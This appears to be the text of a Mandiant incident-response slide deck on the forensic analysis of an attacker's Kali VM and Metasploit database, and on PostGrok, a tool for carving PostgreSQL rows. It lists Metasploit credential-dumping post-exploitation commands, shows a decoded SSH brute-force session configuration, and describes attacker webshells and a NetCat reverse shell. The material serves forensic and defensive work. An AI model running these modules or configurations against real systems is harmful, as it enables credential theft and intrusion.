  • 24. 24© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Forensic Analysis  Investigation inception - Focus on Kali - Export VM - Rinse, wash, repeat
  • 25. 25© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Forensic Analysis  Kali VM - Valuable secure logs - Meterpreter configuration file - SQLMap – Detecting and exploiting SQL flaws - BeEF – The Browser Exploitation Framework - Revealing keyword searches - PostgreSQL history contained some interesting data createuser msf -P -S -R -D createdb -O msf msf exit dropdb msf dropuser msf dropdb ms_test dropuser msf createuser msf -P -S -R -D createdb -O msf msf exit dropdb dropdb msf createdb msf exit
  • 26. 26© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Metasploit and PostgreSQL  PostgreSQL command history tells a story  PostgreSQL is messy - /var/lib/postgresql/<version>/main/base - Collection of binary files - Publicly available parser doesn’t exist
  • 27. 27© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Boot Up  It’s a VM… what if we just boot up the VM and access the DB directly? - Password protected - Single User Mode - Change PW - Profit
  • 28. 28© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL I AM THE ATTACKER Got System Impersonate Attacker
  • 29. 29© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Metasploit… For IR?  Leverage PostgreSQL history to obtain critical DB info  Leverage MSFConsole to interact with PostgreSQL DB createuser msf -P -S -R -D createdb -O msf msf exit dropdb msf dropuser msf dropdb ms_test dropuser msf createuser msf -P -S -R -D createdb -O msf msf exit dropdb dropdb msf createdb msf exit
  • 30. 30© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Metasploit DB Commands Command Function Creds List all credentials in the database Hosts List all hosts in the database Loot Information gained from post-exploitation modules Notes Information from reconnaissance and network enumeration Services Services running on identified hosts Vulns Vulnerabilities identified, and exploitation status
  • 31. 31© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL PostgreSQL Shenanigans  Good… but not great - Not everything had timestamps - Wanted even more detail  Directly accessing the DB and bypassing Metasploit is the better way to go - DB via psql – psql –U msf –h localhost - And…
  • 32. 32© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL SO MANY TABLES!
  • 33. 33© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Metasploit Credential Publics
  • 34. 34© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Metasploit Credential Realms
  • 35. 35© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Sessions
  • 36. 36© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Sessions Decoded ..{$".WORKSPACEI"..:.EF".VERBOSEI" true.;.F" USERNAME".Ultra<REDACTED>" PASSWORD".<REDACTED>".USER_FILEI"..;.F".PASS_FILEI"..;.F".USERPASS_FILEI"..;.F".B RUTEFORCE_SPEEDI".5.;.F".BLANK_PASSWORDSI" false.;.F".USER_AS_PASSI" false.;.F".DB_ALL_CREDSI" false.;.F".DB_ALL_USERSI" false.;.F".DB_ALL_PASSI" false.;.F".STOP_ON_SUCCESSI" false.;.F".REMOVE_USER_FILEI" false.;.F".REMOVE_PASS_FILEI" false.;.F".REMOVE_USERPASS_FILEI" false.;.F".MaxGuessesPerServiceI".0.;.F".MaxMinutesPerServiceI".0.;.F".MaxGuesses PerUserI".0.;.F".InitialAutoRunScript".".AutoRunScript".".RHOSTS".<company.domain .com>".THREADSI".50.;.F".ShowProgressI" true.;.F".ShowProgressPercentI".10.;.FI" RPORT.;.FI".22.;.FI".Proxies.;.FI"..;.F".SSH_DEBUGI" false.;.F".SSH_TIMEOUTI".30.;.F" RHOSTI".<Remote IP Address>.;.F
  • 37. 37© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Case Solved  A complete timeline  A perspective from two sides: - The investigator - The attacker!  Happy client, happy consultant
  • 38. 38© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL POSTGROK: A POST-MORTEM PYTHON PROJECT
  • 39. 39© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Identifying Additional Victims  BUT WAIT… - Attacker had access to C2 server since July 2016 - PostgreSQL history contained evidence of prior DBs - Is there any way to recover deleted DBs?
  • 40. 40© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Identifying Additional Victims  At least three deleted PostgreSQL databases - Data verified via keyword searches  Has anyone ever tried to recover PostgreSQL databases? - Research didn’t identify anything obvious - One project that was a work in progress, but not as much focus on PostgreSQL createuser msf -P -S -R -D createdb -O msf msf exit dropdb msf dropuser msf dropdb ms_test dropuser msf createuser msf -P -S -R -D createdb -O msf msf exit dropdb dropdb msf createdb msf exit
  • 41. 41© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Identifying Additional Victims  Python Hobbyist - PostgreSQL is Open Source - Went on a journey to read C - Created PostGrok to carve all PostgreSQL rows from a flat binary file (raw image)
  • 42. 42© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Down the PostgreSQL Rabbit Hole
  • 43. 43© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL PostgreSQL Terms and Definitions  Anatomy of a PostgreSQL DB - Tables - Page (page header) - Row pointers - Free space - Row entry
  • 44. 44© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL A PostgreSQL Page Color Meaning Red Table Header Blue Row Pointers Yellow Null Space Purple Row Data
  • 45. 45© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL PostgreSQL Page Header  Table header - 24 byte structure - Version info - # of rows = (pd_lower – 24)/24 Version PD_Lower
  • 46. 46© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL PostgreSQL Row Pointers  Row pointers - Four byte structures - Contains offset and size of row
  • 47. 47© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL PostgreSQL Page Free Space  Free space - New row pointers added from start of free space - New row data added to the end
  • 48. 48© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL PostgreSQL Row  Row entry - 24 byte header - Row data Row Header
  • 49. 49© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL PostgreSQL Row Header  Row header - Row insertion ID - Row deletion ID - Number of attributes - Offset of row data Deletion ID Insertion ID # of Attributes Row data offset
  • 50. 50© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Row Data  Row data - Integers - Dates and times - Variable length strings
  • 51. 51© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL PostGrok Capabilities  PostGrok - A Python tool that thoroughly understands PostgreSQL  Capabilities: - Carve PostgreSQL rows from a flat, binary file - Keyword searching - Exports to CSV or XLSX - Officially support version 9.5
  • 52. 52© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL https://github.com/arector327/PostGrok
  • 53. 53© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL PostGrok Findings  PostGrok helped identify: - Full Meterpreter sessions from campaigns occurring in: • July 2016 • August 2016 • September 2016 - 1,428 compromised credentials - 48 enumerated domains
  • 54. 54© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Top Post-Exploitation Modules Module Frequency Function run post/windows/gather/credentials/sso 81 Extract SSO credentials run post/windows/gather/enum_ad_computers 26 Enumerates systems in the default AD directory run post/windows/gather/enum_domains 24 Enumerates domains a host has visibility into run post/windows/gather/smart_hashdump 14 Dumps local accounts from SAM database run post/multi/gather/filezilla_client_cred 11 Collects credentials from FileZilla FTP client run post/windows/gather/credentials/gpp 8 Gathers GPP XML files and extracts pw’s run post/windows/gather/credentials/credential_collector 7 Extracts credentials from host run post/windows/gather/credentials/outlook 4 Extracts and decrypts Outlook passwords from the Windows Registry run post/windows/gather/credentials/tortoisesvn 4 Extracts and decrypts saved TortoiseSVN pw’s
  • 55. 55© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Attacker Creates User Accounts Attacker creates user account “mava2” on victim system
  • 56. 56© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Attacker Uploaded Webshells Attacker uploads “ntdaddy.php” and “cmd.php” to victim web server
  • 57. 57© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Attacker Data Theft Attacker downloads file “wifi_pass.xlsx” from victim workstation Attacker views contents of “FileZilla.txt” and downloads “23.7.2016.xls”
  • 58. 58© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Attacker Tradecraft Attacker executes PsExec, creates reverse shell using NetCat
  • 59. 59© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Attacker Tradecraft (cont.) Attacker attempts to unzip the archive “file.zip”, is unsuccessful and downloads DLL from another compromised web server
  • 60. 60© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Summary  Mandiant investigated an intrusion conducted by an unknown attacker  Obtained a C2 server, and performed forensic analysis  Developed a tool to carve PostgreSQL rows from an image
  • 61. 61© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Takeaways  Metasploit gets the job done  Operational security  Just ask
  • 62. 62© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL QUESTIONS?

Editor's Notes

  1. Add ‘joke’ slide
  2. Easy slide to breeze past on, client contacts us with alert, we immediately recognize as a classic Metasploit PowerShell payload, pretty likely this is bad news
  3. Easy slide to breeze past on, client contacts us with alert, we immediately recognize as a classic Metasploit PowerShell payload, pretty likely this is bad news
  4. REDACT BETTER
  5. Warning that things are about to get technical